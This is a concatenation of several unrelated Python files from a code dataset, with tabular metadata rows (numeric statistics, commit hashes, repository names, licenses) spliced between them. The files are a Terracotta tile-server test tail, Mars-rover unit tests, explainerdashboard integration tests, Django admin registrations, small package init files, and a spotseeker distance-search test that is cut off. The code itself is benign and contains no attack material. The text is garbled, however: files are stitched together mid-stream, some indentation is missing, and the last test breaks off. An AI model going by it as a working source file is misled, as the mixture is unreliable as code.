f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
)
assert rv.status_code == 400
# no expression
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?stretch_range=[0,10000)'
)
assert rv.status_code == 400
# missing operand
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2'
'&stretch_range=[0,10000)'
)
assert rv.status_code == 400
# invalid stretch range (syntax)
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000)'
)
assert rv.status_code == 400
# invalid stretch range (value)
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[10000,0]'
)
assert rv.status_code == 400
def test_get_colormap(client):
rv = client.get('/colormap?stretch_range=[0,1]&num_values=100')
assert rv.status_code == 200
assert len(json.loads(rv.data)['colormap']) == 100
def test_get_colormap_invalid(client):
rv = client.get('/colormap?stretch_range=[0,1')
assert rv.status_code == 400
def test_get_colormap_extra_args(client):
rv = client.get('/colormap?stretch_range=[0,1]&num_values=100&foo=bar&baz=quz')
assert rv.status_code == 200
assert len(json.loads(rv.data)['colormap']) == 100
def test_get_spec(client):
from terracotta import __version__
rv = client.get('/swagger.json')
assert rv.status_code == 200
assert json.loads(rv.data)
assert __version__ in rv.data.decode('utf-8')
rv = client.get('/apidoc')
assert rv.status_code == 200
assert b'Terracotta' in rv.data
| 30.731415 | 99 | 0.65595 | 1,862 | 12,815 | 4.338883 | 0.086466 | 0.04456 | 0.06127 | 0.10026 | 0.839708 | 0.805793 | 0.762099 | 0.730288 | 0.709494 | 0.646615 | 0 | 0.049904 | 0.188451 | 12,815 | 416 | 100 | 30.805288 | 0.726923 | 0.019664 | 0 | 0.552448 | 0 | 0.020979 | 0.233822 | 0.193497 | 0 | 0 | 0 | 0 | 0.27972 | 1 | 0.104895 | false | 0 | 0.076923 | 0 | 0.188811 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e05c65974024f19246bfde72289d00cbac7e1014
| 32 |
py
|
Python
|
esperanto_analyzer/web/__init__.py
|
fidelisrafael/esperanto-analyzer
|
af1e8609ec0696e3d1975aa0ba0c88e5f04f8468
|
[
"BSD-2-Clause"
] | 18 |
2018-09-05T00:46:47.000Z
|
2021-12-08T08:54:35.000Z
|
esperanto_analyzer/web/__init__.py
|
fidelisrafael/esperanto-analyzer
|
af1e8609ec0696e3d1975aa0ba0c88e5f04f8468
|
[
"BSD-2-Clause"
] | null | null | null |
esperanto_analyzer/web/__init__.py
|
fidelisrafael/esperanto-analyzer
|
af1e8609ec0696e3d1975aa0ba0c88e5f04f8468
|
[
"BSD-2-Clause"
] | 3 |
2019-03-12T17:54:18.000Z
|
2020-01-11T13:05:03.000Z
|
from .api.server import run_app
| 16 | 31 | 0.8125 | 6 | 32 | 4.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0ecfc00a422b2dc3bba9eb71d7782113b804c267
| 4,351 |
py
|
Python
|
tests/services/test_rover_runner_service.py
|
dev-11/mars-rover-challenge
|
67569fcc4b93e5ec4cbe466d7a2fd5b3e9a316b0
|
[
"MIT"
] | null | null | null |
tests/services/test_rover_runner_service.py
|
dev-11/mars-rover-challenge
|
67569fcc4b93e5ec4cbe466d7a2fd5b3e9a316b0
|
[
"MIT"
] | null | null | null |
tests/services/test_rover_runner_service.py
|
dev-11/mars-rover-challenge
|
67569fcc4b93e5ec4cbe466d7a2fd5b3e9a316b0
|
[
"MIT"
] | null | null | null |
import unittest
from services import RoverRunnerService
from tests.test_environment.marses import small_mars_with_one_rover_empty_commands
from tests.test_environment import mocks as m
from data_objects import Rover
class TestRoverRunnerService(unittest.TestCase):
def test_rover_runner_moves_rover_forward(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run(['M'])
self.assertEqual(Rover(0, 1, 'N'), final_pos)
def test_rover_runner_turns_rover_left(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run(['L'])
self.assertEqual(Rover(0, 0, 'W'), final_pos)
def test_rover_runner_turns_rover_right(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run(['R'])
self.assertEqual(Rover(0, 0, 'E'), final_pos)
def test_rover_runner_goes_off_gird_east(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(1, 1, "E")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_east_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_goes_off_gird_north(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(1, 1, "N")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_goes_off_gird_west(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(0, 1, "W")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_west_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_goes_off_gird_south(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(0, 0, "S")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_south_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_does_nothing_empty_command(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run([])
self.assertEqual(rover, final_pos)
def test_rover_runner_raises_error_for_None_command(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(TypeError, rrs.run, None)
| 51.188235 | 85 | 0.746495 | 615 | 4,351 | 4.77561 | 0.117073 | 0.055158 | 0.061287 | 0.081716 | 0.872319 | 0.857337 | 0.845761 | 0.824311 | 0.799796 | 0.799796 | 0 | 0.005294 | 0.175132 | 4,351 | 84 | 86 | 51.797619 | 0.81304 | 0 | 0 | 0.575342 | 0 | 0 | 0.003218 | 0 | 0 | 0 | 0 | 0 | 0.123288 | 1 | 0.123288 | false | 0 | 0.068493 | 0 | 0.205479 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0ee6801d23fab1803ee54e727965d043d1914412
| 224 |
py
|
Python
|
comcenterproject/project/helpers.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
comcenterproject/project/helpers.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
comcenterproject/project/helpers.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""WebHelpers used in project."""
#from webhelpers import date, feedgenerator, html, number, misc, text
from markupsafe import Markup
def bold(text):
return Markup('<strong>%s</strong>' % text)
| 24.888889 | 69 | 0.6875 | 29 | 224 | 5.310345 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005263 | 0.151786 | 224 | 9 | 70 | 24.888889 | 0.805263 | 0.526786 | 0 | 0 | 0 | 0 | 0.19 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 |
0
| 6 |
163ee50e70aae9c38787e48d9c60c83c946fac91
| 9,923 |
py
|
Python
|
tests/integration_tests/test_dashboards.py
|
hugocool/explainerdashboard
|
e725528c3d94a1a45b51bd9632686d0697274f54
|
[
"MIT"
] | 1 |
2021-11-19T09:30:56.000Z
|
2021-11-19T09:30:56.000Z
|
tests/integration_tests/test_dashboards.py
|
hugocool/explainerdashboard
|
e725528c3d94a1a45b51bd9632686d0697274f54
|
[
"MIT"
] | null | null | null |
tests/integration_tests/test_dashboards.py
|
hugocool/explainerdashboard
|
e725528c3d94a1a45b51bd9632686d0697274f54
|
[
"MIT"
] | null | null | null |
import dash
from catboost import CatBoostClassifier, CatBoostRegressor
from xgboost import XGBClassifier, XGBRegressor
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from explainerdashboard.explainers import ClassifierExplainer, RegressionExplainer
from explainerdashboard.datasets import titanic_survive, titanic_fare, titanic_embarked, titanic_names
from explainerdashboard.dashboards import ExplainerDashboard
def get_classification_explainer(xgboost=False, include_y=True):
X_train, y_train, X_test, y_test = titanic_survive()
if xgboost:
model = XGBClassifier().fit(X_train, y_train)
else:
model = RandomForestClassifier(n_estimators=50, max_depth=10).fit(X_train, y_train)
if include_y:
explainer = ClassifierExplainer(
model, X_test, y_test,
cats=['Sex', 'Deck', 'Embarked'],
labels=['Not survived', 'Survived'])
else:
explainer = ClassifierExplainer(
model, X_test,
cats=['Sex', 'Deck', 'Embarked'],
labels=['Not survived', 'Survived'])
explainer.calculate_properties()
return explainer
def get_regression_explainer(xgboost=False, include_y=True):
X_train, y_train, X_test, y_test = titanic_fare()
train_names, test_names = titanic_names()
if xgboost:
model = XGBRegressor().fit(X_train, y_train)
else:
model = RandomForestRegressor(n_estimators=50, max_depth=10).fit(X_train, y_train)
if include_y:
reg_explainer = RegressionExplainer(model, X_test, y_test,
cats=['Sex', 'Deck', 'Embarked'],
idxs=test_names,
units="$")
else:
reg_explainer = RegressionExplainer(model, X_test,
cats=['Sex', 'Deck', 'Embarked'],
idxs=test_names,
units="$")
reg_explainer.calculate_properties()
return reg_explainer
def get_multiclass_explainer(xgboost=False, include_y=True):
X_train, y_train, X_test, y_test = titanic_embarked()
train_names, test_names = titanic_names()
if xgboost:
model = XGBClassifier().fit(X_train, y_train)
else:
model = RandomForestClassifier(n_estimators=50, max_depth=10).fit(X_train, y_train)
if include_y:
if xgboost:
multi_explainer = ClassifierExplainer(model, X_test, y_test,
model_output='logodds',
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
else:
multi_explainer = ClassifierExplainer(model, X_test, y_test,
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
else:
if xgboost:
multi_explainer = ClassifierExplainer(model, X_test,
model_output='logodds',
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
else:
multi_explainer = ClassifierExplainer(model, X_test,
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
multi_explainer.calculate_properties()
return multi_explainer
def get_catboost_classifier():
X_train, y_train, X_test, y_test = titanic_survive()
train_names, test_names = titanic_names()
model = CatBoostClassifier(iterations=100, verbose=0).fit(X_train, y_train)
explainer = ClassifierExplainer(
model, X_test, y_test,
cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']},
'Deck', 'Embarked'],
labels=['Not survived', 'Survived'],
idxs=test_names)
X_cats, y_cats = explainer.X_merged, explainer.y.astype("int")
model = CatBoostClassifier(iterations=5, verbose=0).fit(X_cats, y_cats, cat_features=[5, 6, 7])
explainer = ClassifierExplainer(model, X_cats, y_cats, idxs=X_test.index)
explainer.calculate_properties(include_interactions=False)
return explainer
def get_catboost_regressor():
X_train, y_train, X_test, y_test = titanic_fare()
model = CatBoostRegressor(iterations=5, verbose=0).fit(X_train, y_train)
explainer = RegressionExplainer(model, X_test, y_test,
cats=["Sex", 'Deck', 'Embarked'])
X_cats, y_cats = explainer.X_merged, explainer.y
model = CatBoostRegressor(iterations=5, verbose=0).fit(X_cats, y_cats, cat_features=[5, 6, 7])
explainer = RegressionExplainer(model, X_cats, y_cats, idxs=X_test.index)
explainer.calculate_properties(include_interactions=False)
return explainer
def test_classification_dashboard(dash_duo):
explainer = get_classification_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_regression_dashboard(dash_duo):
explainer = get_regression_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=20)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_simple_classification_dashboard(dash_duo):
explainer = get_classification_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False, simple=True)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("#simple-classifier-composite-title", "testing", timeout=20)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_simple_regression_dashboard(dash_duo):
explainer = get_regression_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False, simple=True)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("#simple-regression-composite-title", "testing", timeout=20)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_multiclass_dashboard(dash_duo):
explainer = get_multiclass_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_xgboost_classification_dashboard(dash_duo):
explainer = get_classification_explainer(xgboost=True)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_xgboost_regression_dashboard(dash_duo):
explainer = get_regression_explainer(xgboost=True)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_xgboost_multiclass_dashboard(dash_duo):
explainer = get_multiclass_explainer(xgboost=True)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_classification_dashboard_no_y(dash_duo):
explainer = get_classification_explainer(include_y=False)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_regression_dashboard_no_y(dash_duo):
explainer = get_regression_explainer(include_y=False)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_multiclass_dashboard_no_y(dash_duo):
explainer = get_multiclass_explainer(include_y=False)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_catboost_classification_dashboard(dash_duo):
explainer = get_catboost_classifier()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_cat_boost_regression_dashboard(dash_duo):
explainer = get_catboost_regressor()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
| 44.698198 | 102 | 0.665121 | 1,141 | 9,923 | 5.491674 | 0.099912 | 0.058091 | 0.014523 | 0.024896 | 0.855889 | 0.855889 | 0.818864 | 0.802107 | 0.714172 | 0.668209 | 0 | 0.008513 | 0.230575 | 9,923 | 222 | 103 | 44.698198 | 0.812181 | 0 | 0 | 0.647727 | 0 | 0 | 0.113284 | 0.006853 | 0 | 0 | 0 | 0 | 0.073864 | 1 | 0.102273 | false | 0 | 0.039773 | 0 | 0.170455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
16a329d42e5fe4d870ae6840dac571c4c4bd741b
| 221 |
py
|
Python
|
ImageSearcher/admin.py
|
carpensa/dicom-harpooner
|
2d998c22c51e372fb9b5f3508c900af6f4405cd3
|
[
"BSD-3-Clause"
] | 1 |
2021-05-24T21:45:05.000Z
|
2021-05-24T21:45:05.000Z
|
ImageSearcher/admin.py
|
carpensa/dicom-harpooner
|
2d998c22c51e372fb9b5f3508c900af6f4405cd3
|
[
"BSD-3-Clause"
] | null | null | null |
ImageSearcher/admin.py
|
carpensa/dicom-harpooner
|
2d998c22c51e372fb9b5f3508c900af6f4405cd3
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib import admin
from dicoms.models import Subject
from dicoms.models import Session
from dicoms.models import Series
admin.site.register(Session)
admin.site.register(Subject)
admin.site.register(Series)
| 24.555556 | 33 | 0.837104 | 32 | 221 | 5.78125 | 0.375 | 0.162162 | 0.259459 | 0.356757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090498 | 221 | 8 | 34 | 27.625 | 0.920398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.571429 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
bc5ea9e7a84513ea2108b53d14947d94915f3a05
| 26 |
py
|
Python
|
__init__.py
|
mschrimpf/CapsNetKeras
|
4c514860bf6689fb1772a7bd858638cd538ff22f
|
[
"MIT"
] | null | null | null |
__init__.py
|
mschrimpf/CapsNetKeras
|
4c514860bf6689fb1772a7bd858638cd538ff22f
|
[
"MIT"
] | null | null | null |
__init__.py
|
mschrimpf/CapsNetKeras
|
4c514860bf6689fb1772a7bd858638cd538ff22f
|
[
"MIT"
] | null | null | null |
from .capsulenet import *
| 13 | 25 | 0.769231 | 3 | 26 | 6.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
bca685ecc21d97e8e24f16ef46f6aaabe24a9d13
| 21,795 |
py
|
Python
|
spotseeker_server/test/search/distance.py
|
uw-it-aca/spotseeker_server
|
1d8a5bf98b76fdcb807ed4cd32f939bb7e9aa66c
|
[
"Apache-2.0"
] | 5 |
2015-03-12T00:36:33.000Z
|
2022-02-24T16:41:25.000Z
|
spotseeker_server/test/search/distance.py
|
uw-it-aca/spotseeker_server
|
1d8a5bf98b76fdcb807ed4cd32f939bb7e9aa66c
|
[
"Apache-2.0"
] | 133 |
2016-02-03T23:54:45.000Z
|
2022-03-30T21:33:58.000Z
|
spotseeker_server/test/search/distance.py
|
uw-it-aca/spotseeker_server
|
1d8a5bf98b76fdcb807ed4cd32f939bb7e9aa66c
|
[
"Apache-2.0"
] | 6 |
2015-01-07T23:21:15.000Z
|
2017-12-07T08:26:33.000Z
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from django.test import TestCase
from django.conf import settings
from django.test.client import Client
from spotseeker_server.models import Spot
import simplejson as json
from decimal import *
from django.test.utils import override_settings
from mock import patch
from spotseeker_server import models
@override_settings(SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok")
class SpotSearchDistanceTest(TestCase):
def test_invalid_latitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "bad_data",
"center_longitude": -40,
"distance": 10,
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad latitude"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_invalid_longitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "30",
"center_longitude": "bad_data",
"distance": "10",
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad longitude"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_invalid_height(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "30",
"center_longitude": -40,
"height_from_sea_level": "bad_data",
"distance": "10",
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad height"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_invalid_distance(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "30",
"center_longitude": "-40",
"distance": "bad_data",
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad distance"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_longitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": 30, "center_longitude": 190, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too large longitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_latitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": 100, "center_longitude": -40, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too large latitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_negative_latitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": -100, "center_longitude": -40, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too negative latitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_negative_longitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": 40, "center_longitude": -190, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too negative longitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_no_params(self):
c = Client()
response = c.get("/api/v1/spot", {})
self.assertEquals(
response.status_code, 200, "Accepts a query with no params"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_distances(self):
# Spots are in the atlantic to make them less likely to collide
# with actual spots
center_lat = 30.000000
center_long = -40.000000
# Inner spots are 10 meters away from the center
# Mid spots are 50 meters away from the center
# Outer spots are 100 meters away from the center
# Far out spots are 120 meters away, at the north
# Creating these from the outside in, so things that sort by
# primary key will give bad results for things that should be
# sorted by distance
for i in range(0, 100):
far_out = Spot.objects.create(
name="Far Out %s" % i,
latitude=Decimal("30.0010779783"),
longitude=Decimal("-40.0"),
)
far_out.save()
outer_top = Spot.objects.create(
name="Outer Top",
latitude=Decimal("30.0008983153"),
longitude=Decimal("-40.0"),
)
outer_top.save()
outer_bottom = Spot.objects.create(
name="Outer Bottom",
latitude=Decimal("29.9991016847"),
longitude=Decimal("-40.0"),
)
outer_bottom.save()
outer_left = Spot.objects.create(
name="Outer Left",
latitude=Decimal("30.0"),
longitude=Decimal("-40.0010372851"),
)
outer_left.save()
outer_right = Spot.objects.create(
name="Outer Right",
latitude=Decimal("30.0"),
longitude=Decimal("-39.9989627149"),
)
outer_right.save()
mid_top = Spot.objects.create(
name="Mid Top",
latitude=Decimal(" 30.0004491576"),
longitude=Decimal("-40.0"),
)
mid_top.save()
mid_bottom = Spot.objects.create(
name="Mid Bottom",
latitude=Decimal("29.9995508424"),
longitude=Decimal("-40.0"),
)
mid_bottom.save()
mid_left = Spot.objects.create(
name="Mid Left",
latitude=Decimal("30.0"),
longitude=Decimal("-40.0005186426"),
)
mid_left.save()
mid_right = Spot.objects.create(
name="Mid Right",
latitude=Decimal("30.0"),
longitude=Decimal("-39.9994813574"),
)
mid_right.save()
inner_top = Spot.objects.create(
name="Inner Top",
latitude=Decimal("30.0000898315"),
longitude=Decimal("-40.0"),
)
inner_top.save()
inner_bottom = Spot.objects.create(
name="Inner Bottom",
latitude=Decimal("29.9999101685"),
longitude=Decimal("-40.0"),
)
inner_bottom.save()
inner_left = Spot.objects.create(
name="Inner Left",
latitude=Decimal("30.0"),
longitude=Decimal("-40.0001037285"),
)
inner_left.save()
inner_right = Spot.objects.create(
name="Inner Right",
latitude=Decimal("30.0"),
longitude=Decimal("-39.9998962715"),
)
inner_right.save()
# Testing to make sure too small of a radius returns nothing
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 1,
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with no matches"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
# Testing the inner ring
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 12,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 4, "Returns 4 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]], 1, "Spot matches a unique inner spot"
)
spot_ids[spot["id"]] = 2
# Testing the mid ring
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 60,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 8, "Returns 8 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
